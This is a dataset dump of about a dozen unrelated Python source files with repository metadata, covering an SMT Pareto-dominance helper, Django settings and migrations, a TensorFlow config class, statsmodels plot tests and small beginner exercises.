DisjunctionOrLessMetrics.append(SMTLib.SMT_LT(self.metrics_variables[i], SMTLib.SMT_IntConst(Common.evalForNum(model, self.metrics_variables[i].convert(self.cfr.solver.converter)))))#model[self.metrics_variables[i]])
return SMTLib.SMT_Or(*DisjunctionOrLessMetrics)
def ConstraintEqualToX(self, model):
"""
Returns a Constraint that a new instance, can't be dominated by the instance represented by model.
(it can't be worst in any objective).
"""
EqualMetrics = list()
for i in range(len(self.metrics_variables)):
EqualMetrics.append(SMTLib.SMT_EQ(self.metrics_variables[i], Common.evalForNum(model, self.metrics_variables[i])))
return SMTLib.SMT_And(EqualMetrics)
def get_metric_values(self, model):
metrics = list()
for i in range(len(self.metrics_variables)):
strval = str(model.eval(self.metrics_variables[i].convert(self.cfr.solver.converter)))
try:
val = int(strval)
except:
val = float(strval)
metrics.append(val)
return metrics
def ConstraintMustDominatesX(self, model):
"""
Returns a constraint that a new instance has to be better than the instance represented by model in at least one dimension,
and better or equal in all the other ones.
"""
dominationDisjunction= []
i = 0
for dominatedByMetric in self.metrics_variables:
dominationConjunction = []
j = 0
if self.metrics_objective_direction[i] == Common.METRICS_MAXIMIZE:
dominationConjunction.append(SMTLib.SMT_GT(dominatedByMetric,
SMTLib.SMT_IntConst(Common.evalForNum(model, dominatedByMetric.convert(self.cfr.solver.converter)))))
else:
dominationConjunction.append(SMTLib.SMT_LT(dominatedByMetric,
SMTLib.SMT_IntConst(Common.evalForNum(model, dominatedByMetric.convert(self.cfr.solver.converter)))))
for AtLeastEqualInOtherMetric in self.metrics_variables:
if j != i:
if self.metrics_objective_direction[j] == Common.METRICS_MAXIMIZE:
dominationConjunction.append(SMTLib.SMT_GE(AtLeastEqualInOtherMetric,
SMTLib.SMT_IntConst(Common.evalForNum(model, AtLeastEqualInOtherMetric.convert(self.cfr.solver.converter)))))
else:
dominationConjunction.append(SMTLib.SMT_LE(AtLeastEqualInOtherMetric,
SMTLib.SMT_IntConst(Common.evalForNum(model, AtLeastEqualInOtherMetric.convert(self.cfr.solver.converter)))))
j = 1 + j
i = 1 + i
dominationDisjunction.append(SMTLib.SMT_And(*dominationConjunction))
constraintDominateX = SMTLib.SMT_Or(*dominationDisjunction)
return constraintDominateX
| [
"[email protected]"
] | |
3b20d8bc8956d16dfbb697f43dec97305b5fa7df | 8ef6dbdd3791dd7fbe1320483a22e0540c54359b | /Core Python/Dictionary/19Nested.py | 83bae4d2c11b6adf2d1a3a4876f39b5fc4330d28 | [] | no_license | kundan4U/Python | 8095eecba088910d2068a6375c907d47f2bb9c95 | 6b3fdbe66edb52e9f612352abb9c6563547b6297 | refs/heads/main | 2023-06-24T06:29:43.770282 | 2021-07-21T18:40:11 | 2021-07-21T18:40:11 | 388,213,053 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 331 | py |
# Nested Dictionary
# Empty NEsted dictionary
z={
1:{},
2:{},
3:{}
}
# Access Element
a = {'course':'python','fees':15000,1:{'course':'javaScript','fees':100000}}
print(a['course'])
print(a[1])
print(a[1]['fees'],"\n")
# Modifi Element
print("Before Modifieng",a)
a['course']= 'Machine Learning'
print(" After modife ",a) | [
"[email protected]"
] | |
04facd847cbb9cda0046a3abb22c61f30f0cee65 | 6f844abf7c436a4ae3444744c523f5f1fe6367a4 | /UserBase/migrations/0016_auto_20171123_1931.py | fb52007d0c78de3f27659bd6a8992c3d97a6bb13 | [] | no_license | deepakbhamla/Halanx_Backend_Task | 1dd02a1061eb4d4f6072a3276735cb606dfec752 | acda98c6b79690689317585dd06cf0c1cfc65192 | refs/heads/master | 2022-04-12T10:02:29.740781 | 2020-03-12T12:17:22 | 2020-03-12T12:27:12 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 489 | py | # -*- coding: utf-8 -*-
# Generated by Django 1.11.7 on 2017-11-23 14:01
from __future__ import unicode_literals
from django.db import migrations, models
class Migration(migrations.Migration):
dependencies = [
('UserBase', '0015_customer_profilepic'),
]
operations = [
migrations.AlterField(
model_name='customer',
name='ProfilePic',
field=models.TextField(blank=True, help_text='In Base64', null=True),
),
]
| [
"[email protected]"
] | |
84bf444bf1e614422ec13359d22a0d727da1ca4c | d9e0585e57b482d91e8af7514e683e2488e23381 | /dbcog/models/leader_skill_model.py | 804712af51304155ae45a7a870eda7e86f31d374 | [
"MIT"
] | permissive | TrendingTechnology/pad-cogs | d08abb8da8bf2763a4091a29139168d8c1d2333a | b913a4e16a6473b8b53fae4bda564bedcc82c876 | refs/heads/master | 2023-08-11T01:10:22.088761 | 2021-09-19T00:41:43 | 2021-09-19T00:41:43 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,847 | py | import re
from .base_model import BaseModel
class LeaderSkillModel(BaseModel):
def __init__(self, **kwargs):
self.leader_skill_id = kwargs['leader_skill_id']
self.name_ja = kwargs['name_ja']
self.name_en = kwargs['name_en']
self.name_ko = kwargs['name_ko']
self.max_hp = kwargs['max_hp']
self.max_atk = kwargs['max_atk']
self.max_rcv = kwargs['max_rcv']
self.max_shield = kwargs['max_shield']
self.max_combos = kwargs['max_combos']
self.bonus_damage = kwargs['bonus_damage']
self.mult_bonus_damage = kwargs['mult_bonus_damage']
self.extra_time = kwargs['extra_time']
self.tags = [int(tag) for tag in re.findall(r'\((\d+)\)', kwargs['tags'])]
self.desc_en = kwargs['desc_en']
self.desc_ja = kwargs['desc_ja']
self.desc_ko = kwargs['desc_ko']
@property
def data(self):
return (self.max_hp,
self.max_atk,
self.max_rcv,
self.max_shield,
self.max_combos,
self.bonus_damage,
self.mult_bonus_damage,
self.extra_time)
@property
def desc(self):
return self.desc_en or self.desc_ja
@property
def name(self):
return self.name_en or self.name_ja
@property
def is_7x6(self):
return 200 in self.tags
def to_dict(self):
return {
'leader_skill_id': self.leader_skill_id,
'name_ja': self.name_ja,
'name_en': self.name_en,
}
def __eq__(self, other):
if isinstance(other, LeaderSkillModel):
return self.leader_skill_id == other.leader_skill_id \
and self.data == other.data \
and self.desc_en == other.desc_en
return False
| [
"[email protected]"
] | |
46a00379b4971f43bbcd75efd489630c9201401e | 470c6e447c7ee6daed90a0bf1216e2fb838282b6 | /rtl/tasks/open.py | 1b982debfdebfb9d21abbbfe2a35895eedbfcc43 | [
"Apache-2.0"
] | permissive | kelceydamage/raspi-tasks | d0300173b2eba274a5c0a974b7ecb8817586d22d | 18aa323e3e2428c998b7472c226d05a00c8ae8c2 | refs/heads/master | 2020-07-02T11:55:27.276343 | 2019-08-10T06:42:42 | 2019-08-10T06:42:42 | 201,520,835 | 1 | 0 | null | null | null | null | UTF-8 | Python | false | false | 3,396 | py | #!/usr/bin/env python3
# ------------------------------------------------------------------------ 79->
# Author: ${name=Kelcey Damage}
# Python: 3.5+
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
# Doc
# ------------------------------------------------------------------------ 79->
#
# Imports
# ------------------------------------------------------------------------ 79->
import zlib
import ast
import ujson as json
import numpy as np
from numpy import ndarray
from numpy import array
from rtl.common.task import Task
# Globals
# ------------------------------------------------------------------------ 79->
# Classes
# ------------------------------------------------------------------------ 79->
class Open(Task):
def __init__(self, kwargs, content):
super(Open, self).__init__(kwargs, content)
self.keys = [
'compression',
'delimiter',
'encoding'
]
self.defaults = {
'compression': False,
'delimiter': '\n',
'encoding': False
}
self.configuration = {}
self.mode = 'r'
for key in self.keys:
if key in kwargs:
self.configuration[key] = kwargs[key]
else:
self.configuration[key] = self.defaults[key]
def openfile(self):
if self.configuration['compression']:
self.mode = 'rb'
with open('{0}/{1}'.format(self.path, self.file), self.mode) as f:
r = f.read()
if self.configuration['compression']:
r = zlib.decompress(r).decode()
parts = r.replace('][', ']\n[').split('\n')
return parts
def decode(self, parts):
results = []
while parts:
item = parts.pop().strip('\n')
if item == '':
continue
if self.configuration['encoding']:
item = json.loads(item.rstrip())
else:
item = item.rstrip().split(self.configuration['delimiter'])
results.append(item)
return results
def open(self):
parts = self.openfile()
if parts == [''] or parts == '':
return [[False]]
results = self.decode(parts)
del parts
if self.mixed:
self.data = {i: results[i] for i in range(len(results))}
self.data['headers'] = self.headers
else:
self.ndata = np.ndarray(
(len(results), len(results[0])),
buffer=array(results),
dtype=np.dtype(int)
)
return self
# Functions
# ------------------------------------------------------------------------ 79->
def task_open(kwargs, contents):
return Open(kwargs, contents).open().getContents()
# Main
# ------------------------------------------------------------------------ 79->
| [
"[email protected]"
] | |
4d2c140c6db6f542dc0a49fd239d9fe840daa562 | ad13583673551857615498b9605d9dcab63bb2c3 | /output/instances/msData/datatypes/Facets/double/double_enumeration002.py | 59133e9f2219248cc567d675c7fac346d16f2afd | [
"MIT"
] | permissive | tefra/xsdata-w3c-tests | 397180205a735b06170aa188f1f39451d2089815 | 081d0908382a0e0b29c8ee9caca6f1c0e36dd6db | refs/heads/main | 2023-08-03T04:25:37.841917 | 2023-07-29T17:10:13 | 2023-07-30T12:11:13 | 239,622,251 | 2 | 0 | MIT | 2023-07-25T14:19:04 | 2020-02-10T21:59:47 | Python | UTF-8 | Python | false | false | 273 | py | from output.models.ms_data.datatypes.facets.double.double_enumeration002_xsd.double_enumeration002 import FooTypeFoo
from output.models.ms_data.datatypes.facets.double.double_enumeration002_xsd.double_enumeration002 import Test
obj = Test(
foo=FooTypeFoo.VALUE_1_1
)
| [
"[email protected]"
] | |
a097e28031810d9e35910e6b6bf5d6a647d3a901 | 21a5d36b32ddf277be891fd1f0e93d458c4f0c2f | /official/modeling/hyperparams/base_config.py | 7ce5ce2d55016dce0c985a0e6f9fe3893a25f644 | [
"Apache-2.0"
] | permissive | pkulzc/models | 7cf3b718bc4edba53accd14b692712f6c1883578 | 2ec6572e1b79127a7cf905c1e67ec6568e364f10 | refs/heads/master | 2021-06-28T08:04:36.609825 | 2020-06-18T17:54:53 | 2020-06-18T22:00:50 | 126,526,822 | 8 | 9 | Apache-2.0 | 2018-03-23T18:50:30 | 2018-03-23T18:50:29 | null | UTF-8 | Python | false | false | 8,964 | py | # Lint as: python3
# Copyright 2020 The TensorFlow Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ==============================================================================
"""Base configurations to standardize experiments."""
from __future__ import absolute_import
from __future__ import division
# from __future__ import google_type_annotations
from __future__ import print_function
import copy
import functools
from typing import Any, List, Mapping, Optional, Type
import dataclasses
import tensorflow as tf
import yaml
from official.modeling.hyperparams import params_dict
@dataclasses.dataclass
class Config(params_dict.ParamsDict):
"""The base configuration class that supports YAML/JSON based overrides.
* It recursively enforces a whitelist of basic types and container types, so
it avoids surprises with copy and reuse caused by unanticipated types.
* It converts dict to Config even within sequences,
e.g. for config = Config({'key': [([{'a': 42}],)]),
type(config.key[0][0][0]) is Config rather than dict.
"""
# It's safe to add bytes and other immutable types here.
IMMUTABLE_TYPES = (str, int, float, bool, type(None))
# It's safe to add set, frozenset and other collections here.
SEQUENCE_TYPES = (list, tuple)
default_params: dataclasses.InitVar[Optional[Mapping[str, Any]]] = None
restrictions: dataclasses.InitVar[Optional[List[str]]] = None
@classmethod
def _isvalidsequence(cls, v):
"""Check if the input values are valid sequences.
Args:
v: Input sequence.
Returns:
True if the sequence is valid. Valid sequence includes the sequence
type in cls.SEQUENCE_TYPES and element type is in cls.IMMUTABLE_TYPES or
is dict or ParamsDict.
"""
if not isinstance(v, cls.SEQUENCE_TYPES):
return False
return (all(isinstance(e, cls.IMMUTABLE_TYPES) for e in v) or
all(isinstance(e, dict) for e in v) or
all(isinstance(e, params_dict.ParamsDict) for e in v))
@classmethod
def _import_config(cls, v, subconfig_type):
"""Returns v with dicts converted to Configs, recursively."""
if not issubclass(subconfig_type, params_dict.ParamsDict):
raise TypeError(
'Subconfig_type should be subclass of ParamsDict, found {!r}'.format(
subconfig_type))
if isinstance(v, cls.IMMUTABLE_TYPES):
return v
elif isinstance(v, cls.SEQUENCE_TYPES):
# Only support one layer of sequence.
if not cls._isvalidsequence(v):
raise TypeError(
'Invalid sequence: only supports single level {!r} of {!r} or '
'dict or ParamsDict found: {!r}'.format(cls.SEQUENCE_TYPES,
cls.IMMUTABLE_TYPES, v))
import_fn = functools.partial(
cls._import_config, subconfig_type=subconfig_type)
return type(v)(map(import_fn, v))
elif isinstance(v, params_dict.ParamsDict):
# Deepcopy here is a temporary solution for preserving type in nested
# Config object.
return copy.deepcopy(v)
elif isinstance(v, dict):
return subconfig_type(v)
else:
raise TypeError('Unknown type: {!r}'.format(type(v)))
@classmethod
def _export_config(cls, v):
"""Returns v with Configs converted to dicts, recursively."""
if isinstance(v, cls.IMMUTABLE_TYPES):
return v
elif isinstance(v, cls.SEQUENCE_TYPES):
return type(v)(map(cls._export_config, v))
elif isinstance(v, params_dict.ParamsDict):
return v.as_dict()
elif isinstance(v, dict):
raise TypeError('dict value not supported in converting.')
else:
raise TypeError('Unknown type: {!r}'.format(type(v)))
@classmethod
def _get_subconfig_type(cls, k) -> Type[params_dict.ParamsDict]:
"""Get element type by the field name.
Args:
k: the key/name of the field.
Returns:
Config as default. If a type annotation is found for `k`,
1) returns the type of the annotation if it is subtype of ParamsDict;
2) returns the element type if the annotation of `k` is List[SubType]
or Tuple[SubType].
"""
subconfig_type = Config
if k in cls.__annotations__:
# Directly Config subtype.
type_annotation = cls.__annotations__[k]
if (isinstance(type_annotation, type) and
issubclass(type_annotation, Config)):
subconfig_type = cls.__annotations__[k]
else:
# Check if the field is a sequence of subtypes.
field_type = getattr(type_annotation, '__origin__', type(None))
if (isinstance(field_type, type) and
issubclass(field_type, cls.SEQUENCE_TYPES)):
element_type = getattr(type_annotation, '__args__', [type(None)])[0]
subconfig_type = (
element_type if issubclass(element_type, params_dict.ParamsDict)
else subconfig_type)
return subconfig_type
def __post_init__(self, default_params, restrictions, *args, **kwargs):
super().__init__(default_params=default_params,
restrictions=restrictions,
*args,
**kwargs)
def _set(self, k, v):
"""Overrides same method in ParamsDict.
Also called by ParamsDict methods.
Args:
k: key to set.
v: value.
Raises:
RuntimeError
"""
subconfig_type = self._get_subconfig_type(k)
if isinstance(v, dict):
if k not in self.__dict__ or not self.__dict__[k]:
# If the key not exist or the value is None, a new Config-family object
# sould be created for the key.
self.__dict__[k] = subconfig_type(v)
else:
self.__dict__[k].override(v)
else:
self.__dict__[k] = self._import_config(v, subconfig_type)
def __setattr__(self, k, v):
if k not in self.RESERVED_ATTR:
if getattr(self, '_locked', False):
raise ValueError('The Config has been locked. ' 'No change is allowed.')
self._set(k, v)
def _override(self, override_dict, is_strict=True):
"""Overrides same method in ParamsDict.
Also called by ParamsDict methods.
Args:
override_dict: dictionary to write to .
is_strict: If True, not allows to add new keys.
Raises:
KeyError: overriding reserved keys or keys not exist (is_strict=True).
"""
for k, v in sorted(override_dict.items()):
if k in self.RESERVED_ATTR:
raise KeyError('The key {!r} is internally reserved. '
'Can not be overridden.'.format(k))
if k not in self.__dict__:
if is_strict:
raise KeyError('The key {!r} does not exist in {!r}. '
'To extend the existing keys, use '
'`override` with `is_strict` = False.'.format(
k, type(self)))
else:
self._set(k, v)
else:
if isinstance(v, dict) and self.__dict__[k]:
self.__dict__[k]._override(v, is_strict) # pylint: disable=protected-access
elif isinstance(v, params_dict.ParamsDict) and self.__dict__[k]:
self.__dict__[k]._override(v.as_dict(), is_strict) # pylint: disable=protected-access
else:
self._set(k, v)
def as_dict(self):
"""Returns a dict representation of params_dict.ParamsDict.
For the nested params_dict.ParamsDict, a nested dict will be returned.
"""
return {
k: self._export_config(v)
for k, v in self.__dict__.items()
if k not in self.RESERVED_ATTR
}
def replace(self, **kwargs):
"""Like `override`, but returns a copy with the current config unchanged."""
params = self.__class__(self)
params.override(kwargs, is_strict=True)
return params
@classmethod
def from_yaml(cls, file_path: str):
# Note: This only works if the Config has all default values.
with tf.io.gfile.GFile(file_path, 'r') as f:
loaded = yaml.load(f)
config = cls()
config.override(loaded)
return config
@classmethod
def from_json(cls, file_path: str):
"""Wrapper for `from_yaml`."""
return cls.from_yaml(file_path)
@classmethod
def from_args(cls, *args, **kwargs):
"""Builds a config from the given list of arguments."""
attributes = list(cls.__annotations__.keys())
default_params = {a: p for a, p in zip(attributes, args)}
default_params.update(kwargs)
return cls(default_params)
| [
"[email protected]"
] | |
1c1a0e0b8ff5071c1c2792231ed5f1acce0adb43 | c2df9e04adec78e789d1fbdb0711c45e5b9263a7 | /venv/Lib/site-packages/mpl_toolkits/axes_grid/grid_helper_curvelinear.py | c425086ada0af2702e837a37bcf0b19bd7ddfa0c | [
"MIT",
"BSD-3-Clause"
] | permissive | AdarshSai/Final_Project | 433009a2f416e894ee3be85cd9317cb8e8df5516 | f966834ca72dd232102ed500ef47ef2b3bdbed5b | refs/heads/main | 2023-01-23T12:21:41.342074 | 2020-11-19T22:24:15 | 2020-11-19T22:24:15 | 308,898,012 | 0 | 1 | MIT | 2020-11-19T22:24:17 | 2020-10-31T14:19:58 | Python | UTF-8 | Python | false | false | 63 | py | from mpl_toolkits.axisartist.grid_helper_curvelinear import *
| [
"[email protected]"
] | |
5930d4f80c56d4ac4735ccaa84bd96cd822d5d74 | 13a32b92b1ba8ffb07e810dcc8ccdf1b8b1671ab | /home--tommy--mypy/mypy/lib/python2.7/site-packages/statsmodels/graphics/tests/test_boxplots.py | 503c5cc20c15d3e577a1709b13de1418c79ccd3c | [
"Unlicense"
] | permissive | tommybutler/mlearnpy2 | 8ec52bcd03208c9771d8d02ede8eaa91a95bda30 | 9e5d377d0242ac5eb1e82a357e6701095a8ca1ff | refs/heads/master | 2022-10-24T23:30:18.705329 | 2022-10-17T15:41:37 | 2022-10-17T15:41:37 | 118,529,175 | 0 | 2 | Unlicense | 2022-10-15T23:32:18 | 2018-01-22T23:27:10 | Python | UTF-8 | Python | false | false | 2,315 | py | import numpy as np
from numpy.testing import dec
from statsmodels.graphics.boxplots import violinplot, beanplot
from statsmodels.datasets import anes96
try:
import matplotlib.pyplot as plt
have_matplotlib = True
except:
have_matplotlib = False
@dec.skipif(not have_matplotlib)
def test_violinplot_beanplot():
# Test violinplot and beanplot with the same dataset.
data = anes96.load_pandas()
party_ID = np.arange(7)
labels = ["Strong Democrat", "Weak Democrat", "Independent-Democrat",
"Independent-Independent", "Independent-Republican",
"Weak Republican", "Strong Republican"]
age = [data.exog['age'][data.endog == id] for id in party_ID]
fig = plt.figure()
ax = fig.add_subplot(111)
violinplot(age, ax=ax, labels=labels,
plot_opts={'cutoff_val':5, 'cutoff_type':'abs',
'label_fontsize':'small',
'label_rotation':30})
plt.close(fig)
fig = plt.figure()
ax = fig.add_subplot(111)
beanplot(age, ax=ax, labels=labels,
plot_opts={'cutoff_val':5, 'cutoff_type':'abs',
'label_fontsize':'small',
'label_rotation':30})
plt.close(fig)
fig = plt.figure()
ax = fig.add_subplot(111)
beanplot(age, ax=ax, labels=labels, jitter=True,
plot_opts={'cutoff_val': 5, 'cutoff_type': 'abs',
'label_fontsize': 'small',
'label_rotation': 30})
plt.close(fig)
fig = plt.figure()
ax = fig.add_subplot(111)
beanplot(age, ax=ax, labels=labels, jitter=True, side='right',
plot_opts={'cutoff_val': 5, 'cutoff_type': 'abs',
'label_fontsize': 'small',
'label_rotation': 30})
plt.close(fig)
fig = plt.figure()
ax = fig.add_subplot(111)
beanplot(age, ax=ax, labels=labels, jitter=True, side='left',
plot_opts={'cutoff_val': 5, 'cutoff_type': 'abs',
'label_fontsize': 'small',
'label_rotation': 30})
plt.close(fig)
fig = plt.figure()
ax = fig.add_subplot(111)
beanplot(age, ax=ax, labels=labels,
plot_opts={'bean_legend_text': 'text'})
plt.close(fig)
| [
"[email protected]"
] | |
3c2c612f1ce660f79c63116378101afddeb27721 | cc4d7a0dc58e70379fda3d1f6b75c7b70ad1e205 | /UDEMY/numbers.py | 42aaed7267cc1885a724c942be82aff76500f3f3 | [] | no_license | evamaina/Python_practice | 2da766d61c111135285323aa2b8fb50ee5b31be1 | ecd6c255dc66b2dc6f2cd81ec79bc42a241bfca1 | refs/heads/master | 2020-03-24T00:08:17.911604 | 2018-07-25T09:17:41 | 2018-07-25T09:17:41 | 142,275,510 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 511 | py | numbers = [1, 2, 3, 4, 5, 6, 7, 8, 9]
# Modify the method below to make sure only even numbers are returned.
def even_numbers():
evens = []
for number in numbers:
if number % 2 == 0:
evens.append(number)
return evens
# Modify the below method so that "Quit" is returned if the choice parameter is "q".
# Don't remove the existing code
def user_menu(choice):
if choice == "a":
return "Add"
elif choice == "q":
return "Quit"
else:
return None | [
"[email protected]"
] | |
a3343c3fc5ec2c28d9012a8f7aab290396c75b50 | 312d40d6023858891dd32bda67579f7284a54c15 | /06/00/keys.py | bb03a499aa679a455ffcfd78b62d8aa5294e54e4 | [
"CC0-1.0"
] | permissive | pylangstudy/201708 | b67a49f091f5f949954e7b9a910a07761fe9a7d1 | 126b1af96a1d1f57522d5a1d435b58597bea2e57 | refs/heads/master | 2021-01-01T20:49:15.973299 | 2017-08-31T00:18:55 | 2017-08-31T00:18:55 | 98,936,656 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 87 | py | d = {'k1':'v1', 'k2':'v2'}; print(d)
print(d.keys())
for k in d.keys(): print(k, d[k])
| [
"[email protected]"
] | |
fd4b14a27556c53af09d1ab430e96ecf11199d9c | 7c7c3a34b266e664cf63f710ae5aff5587672c91 | /ALUS/countingBlobs/createTestingImagesFile.py | 1c4ad82a1afd8acf6aee2de2c29ef1da109498f2 | [] | no_license | Schnei1811/PythonScripts | 845594a886a1fecc81cf5d7c550abec325f006a3 | 89eb331357b7cea86f5b2d0b33089215b73f9481 | refs/heads/main | 2023-03-31T23:36:48.731570 | 2021-04-11T21:55:46 | 2021-04-11T21:55:46 | 356,950,318 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,035 | py | import os
from glob import glob
from tqdm import tqdm
import cv2
# img_dir = "G:\\PythonData\\ALUS\\ALUS_Data\\"
# img_dir = "G:\\PythonData\\ALUS\\ALUS_Mixed_Test_Set\\"
img_dir = "C:\\Users\\Stefan\\Desktop\\CountBlobs\\LCFCN-master\\ALUS_BL\\"
# sizes = [1, 2, 3, 4, 5]
sizes = [5]
for div in sizes:
if not os.path.exists(img_dir + "full_data_test_div{}".format(div)):
os.makedirs(img_dir + "full_data_test_div{}".format(div))
div_path = img_dir + "full_data_test_div{}\\".format(div)
path_lst = []
#import ipdb;ipdb.set_trace()
for img_path in tqdm(glob(img_dir + "full_data_test\\*")):
img_name = div_path + img_path.split("\\")[-1][:-4] + ".JPG"
img = cv2.imread(img_path)
h, w, c = img.shape
resized_img = cv2.resize(img, (int(w / div), int(h / div)))
cv2.imwrite(img_name, resized_img)
path_lst.append(img_name)
with open(img_dir + "test_div{}.txt".format(div), "w") as f:
for path in path_lst:
f.write("%s\n" % path) | [
"[email protected]"
] | |
99f8326596d1987c00f35288f3c8b12c3991b244 | 3ec1f6d425a6ddc350785947a3a864a4820d926f | /thnthn_2/settings.py | 7cdeadef11fccf37d118cb1e90d65ca99c7cacdb | [] | no_license | crowdbotics-apps/thnthn-2 | a8829b4e627c1865ca18772857d4f3abf599da32 | 15a66f105a233c813f27c20e26aff9d19c08b89e | refs/heads/master | 2022-11-09T06:45:47.205540 | 2020-06-27T01:02:14 | 2020-06-27T01:02:14 | 275,275,411 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 5,626 | py | """
Django settings for thnthn_2 project.
Generated by 'django-admin startproject' using Django 2.2.2.
For more information on this file, see
https://docs.djangoproject.com/en/2.2/topics/settings/
For the full list of settings and their values, see
https://docs.djangoproject.com/en/2.2/ref/settings/
"""
import os
import environ
env = environ.Env()
# SECURITY WARNING: don't run with debug turned on in production!
DEBUG = env.bool("DEBUG", default=False)
# Build paths inside the project like this: os.path.join(BASE_DIR, ...)
BASE_DIR = os.path.dirname(os.path.dirname(os.path.abspath(__file__)))
# Quick-start development settings - unsuitable for production
# See https://docs.djangoproject.com/en/2.2/howto/deployment/checklist/
# SECURITY WARNING: keep the secret key used in production secret!
SECRET_KEY = env.str("SECRET_KEY")
ALLOWED_HOSTS = env.list("HOST", default=["*"])
SITE_ID = 1
SECURE_PROXY_SSL_HEADER = ("HTTP_X_FORWARDED_PROTO", "https")
SECURE_SSL_REDIRECT = env.bool("SECURE_REDIRECT", default=False)
# Application definition
INSTALLED_APPS = [
'django.contrib.admin',
'django.contrib.auth',
'django.contrib.contenttypes',
'django.contrib.sessions',
'django.contrib.messages',
'django.contrib.staticfiles',
'django.contrib.sites'
]
LOCAL_APPS = [
'home',
'users.apps.UsersConfig',
]
THIRD_PARTY_APPS = [
'rest_framework',
'rest_framework.authtoken',
'rest_auth',
'rest_auth.registration',
'bootstrap4',
'allauth',
'allauth.account',
'allauth.socialaccount',
'allauth.socialaccount.providers.google',
'django_extensions',
'drf_yasg',
]
INSTALLED_APPS += LOCAL_APPS + THIRD_PARTY_APPS
MIDDLEWARE = [
'django.middleware.security.SecurityMiddleware',
'django.contrib.sessions.middleware.SessionMiddleware',
'django.middleware.common.CommonMiddleware',
'django.middleware.csrf.CsrfViewMiddleware',
'django.contrib.auth.middleware.AuthenticationMiddleware',
'django.contrib.messages.middleware.MessageMiddleware',
'django.middleware.clickjacking.XFrameOptionsMiddleware',
]
ROOT_URLCONF = 'thnthn_2.urls'
TEMPLATES = [
{
'BACKEND': 'django.template.backends.django.DjangoTemplates',
'DIRS': [],
'APP_DIRS': True,
'OPTIONS': {
'context_processors': [
'django.template.context_processors.debug',
'django.template.context_processors.request',
'django.contrib.auth.context_processors.auth',
'django.contrib.messages.context_processors.messages',
],
},
},
]
WSGI_APPLICATION = 'thnthn_2.wsgi.application'
# Database
# https://docs.djangoproject.com/en/2.2/ref/settings/#databases
DATABASES = {
'default': {
'ENGINE': 'django.db.backends.sqlite3',
'NAME': os.path.join(BASE_DIR, 'db.sqlite3'),
}
}
if env.str("DATABASE_URL", default=None):
DATABASES = {
'default': env.db()
}
# Password validation
# https://docs.djangoproject.com/en/2.2/ref/settings/#auth-password-validators
AUTH_PASSWORD_VALIDATORS = [
{
'NAME': 'django.contrib.auth.password_validation.UserAttributeSimilarityValidator',
},
{
'NAME': 'django.contrib.auth.password_validation.MinimumLengthValidator',
},
{
'NAME': 'django.contrib.auth.password_validation.CommonPasswordValidator',
},
{
'NAME': 'django.contrib.auth.password_validation.NumericPasswordValidator',
},
]
# Internationalization
# https://docs.djangoproject.com/en/2.2/topics/i18n/
LANGUAGE_CODE = 'en-us'
TIME_ZONE = 'UTC'
USE_I18N = True
USE_L10N = True
USE_TZ = True
# Static files (CSS, JavaScript, Images)
# https://docs.djangoproject.com/en/2.2/howto/static-files/
STATIC_URL = '/static/'
MIDDLEWARE += ['whitenoise.middleware.WhiteNoiseMiddleware']
AUTHENTICATION_BACKENDS = (
'django.contrib.auth.backends.ModelBackend',
'allauth.account.auth_backends.AuthenticationBackend'
)
STATIC_ROOT = os.path.join(BASE_DIR, "staticfiles")
STATICFILES_DIRS = [
os.path.join(BASE_DIR, 'static')
]
STATICFILES_STORAGE = 'whitenoise.storage.CompressedManifestStaticFilesStorage'
# allauth / users
ACCOUNT_EMAIL_REQUIRED = True
ACCOUNT_AUTHENTICATION_METHOD = 'email'
ACCOUNT_USERNAME_REQUIRED = False
ACCOUNT_EMAIL_VERIFICATION = "mandatory"
ACCOUNT_CONFIRM_EMAIL_ON_GET = True
ACCOUNT_LOGIN_ON_EMAIL_CONFIRMATION = True
ACCOUNT_UNIQUE_EMAIL = True
LOGIN_REDIRECT_URL = "users:redirect"
ACCOUNT_ADAPTER = "users.adapters.AccountAdapter"
SOCIALACCOUNT_ADAPTER = "users.adapters.SocialAccountAdapter"
ACCOUNT_ALLOW_REGISTRATION = env.bool("ACCOUNT_ALLOW_REGISTRATION", True)
SOCIALACCOUNT_ALLOW_REGISTRATION = env.bool("SOCIALACCOUNT_ALLOW_REGISTRATION", True)
REST_AUTH_SERIALIZERS = {
# Replace password reset serializer to fix 500 error
"PASSWORD_RESET_SERIALIZER": "home.api.v1.serializers.PasswordSerializer",
}
REST_AUTH_REGISTER_SERIALIZERS = {
# Use custom serializer that has no username and matches web signup
"REGISTER_SERIALIZER": "home.api.v1.serializers.SignupSerializer",
}
# Custom user model
AUTH_USER_MODEL = "users.User"
EMAIL_HOST = env.str("EMAIL_HOST", "smtp.sendgrid.net")
EMAIL_HOST_USER = env.str("SENDGRID_USERNAME", "")
EMAIL_HOST_PASSWORD = env.str("SENDGRID_PASSWORD", "")
EMAIL_PORT = 587
EMAIL_USE_TLS = True
# Swagger settings for api docs
SWAGGER_SETTINGS = {
"DEFAULT_INFO": f"{ROOT_URLCONF}.api_info",
}
if DEBUG:
# output email to console instead of sending
EMAIL_BACKEND = "django.core.mail.backends.console.EmailBackend"
| [
"[email protected]"
] | |
